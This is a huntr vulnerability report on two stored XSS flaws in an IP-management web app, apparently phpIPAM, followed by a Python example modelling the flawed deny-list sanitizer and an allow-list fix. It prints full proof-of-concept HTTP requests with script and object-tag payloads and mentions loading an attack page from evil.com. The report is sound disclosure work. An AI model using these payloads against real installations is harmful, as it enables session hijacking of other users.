huntr report 3D5199D6-9BB2-4F7B-BD81-BDED704DA499 by zpbrent


Two Stored XSS in Instructions and User Widget

2023-02-12 05:03:33
zpbrent
www.huntr.dev
stored xss
sanitizer bypass
backend database
post request
user widget
injection
javascript codes
administrators
normal user
proof of concept

EPSS

0.001

Percentile

23.3%

Stored XSS 1

Description 1

The sanitizer function noxss_html($html) can be bypassed because its deny list, $banned_elements = ['script', 'iframe', 'embed'];, does not include the <object> tag. Because of this omission, a logged-in admin can inject XSS payloads such as <object data="javascript:alert(1)"> into the backend database through the endpoint POST /app/admin/instructions/edit-result.php with the parameter instructions=<object data="javascript:alert(1)">; other users or admins who later view the instructions then execute the injected script without their consent. Note that <object data="javascript:alert(1)"> currently executes only in Firefox; for Chrome and Edge the attacker would have to inject the code via a third-party link such as <object data="http://evil.com/attack.html">.

Proof of Concept 1

POST /app/admin/instructions/edit-result.php HTTP/1.1
Host: 192.168.232.128
Content-Length: 136
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.232.128
Referer: http://192.168.232.128/index.php?page=administration&section=instructions
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: table-page-size=50; scantype=scan-icmp; phpipam=6s5iofugf1hvnlgju2pdetg34r
Connection: close

instructions=<object data="javascript:alert(1)">&csrf_cookie=bNf8M4rOVnijA0HS6fgSH7l250t6ZgqP&id=1

When another user opens the instruction page in Firefox (our Firefox version is 103.0.1, 64-bit), the malicious code is executed, as shown in the figure below:
[figure: screenshot from the original report]

Stored XSS 2

Description 2

A normal user can update their widget settings through the function $User->self_update_widgets($_POST['widgets']), in which $_POST['widgets'] is not sanitized to remove XSS tags and characters before being stored in the users table of the backend database. As a result, a user can inject malicious JavaScript such as <script>alert(1)</script> using the HTTP POST endpoint POST /app/tools/user-menu/user-widgets-set.php with the parameter widgets=statistics%3Bfavourite_subnets%3Bchangelog%3Btop10_hosts_v4’><script>alert(1)</script><a><script>alert(1)</script><a>
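Added example covering both findings above (Python, not phpIPAM's code): a simplified model of the deny-list sanitizer the report describes, showing that the <object> payload from Description 1 survives the quoted list and is removed once object is added, plus an allow-list validator for the widgets parameter from Description 2. The sanitizer model, its regexes, the detection helper and the widget-name rule are assumptions for illustration, not phpIPAM's implementation.

```python
import re

# Constructed model of a deny-list HTML sanitizer in the spirit of the
# noxss_html() the report describes. It is NOT phpIPAM's code: it only strips
# the listed elements and leaves everything else untouched.
ORIGINAL_BANNED = ['script', 'iframe', 'embed']   # list quoted in the report
HARDENED_BANNED = ORIGINAL_BANNED + ['object']    # element the report says is missing


def denylist_sanitize(html: str, banned) -> str:
    """Strip every banned element (open tag, body and close tag), case-insensitively."""
    out = html
    for el in banned:
        # <el ...>body</el>
        out = re.sub(rf'<{el}\b[^>]*>.*?</{el}\s*>', '', out, flags=re.I | re.S)
        # dangling or self-closing <el ...> with no closing tag
        out = re.sub(rf'<{el}\b[^>]*>', '', out, flags=re.I)
        # stray closing tags
        out = re.sub(rf'</{el}\s*>', '', out, flags=re.I)
    return out


def still_has_active_content(html: str) -> bool:
    """Detection check: does a script-capable element or a javascript: URL survive?"""
    active = re.compile(r'<(?:script|iframe|embed|object)\b|javascript\s*:', re.I)
    return active.search(html) is not None


# Allow-list validation for the widgets parameter: ';'-separated identifiers only.
# The identifier rule is an assumption modelled on the widget names in the report.
WIDGET_NAME = re.compile(r'[a-z0-9_]+')


def validate_widgets(raw: str):
    """Return the list of widget names, or None if any token is not a plain identifier."""
    names = raw.split(';')
    if any(not WIDGET_NAME.fullmatch(n) for n in names):
        return None
    return names


if __name__ == '__main__':
    payload = '<object data="javascript:alert(1)">'
    print(denylist_sanitize(payload, ORIGINAL_BANNED))   # payload survives unchanged
    print(denylist_sanitize(payload, HARDENED_BANNED))   # empty string
    print(validate_widgets("statistics;favourite_subnets;changelog;top10_hosts_v4"))
    print(validate_widgets("statistics;favourite_subnets;changelog;top10_hosts_v4'><script>alert(1)</script><a>"))
```

Adding object to the deny list closes the reported bypass, but a deny list stays fragile; an allow list of permitted elements, as used here for the widget names, is the sturdier fix.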
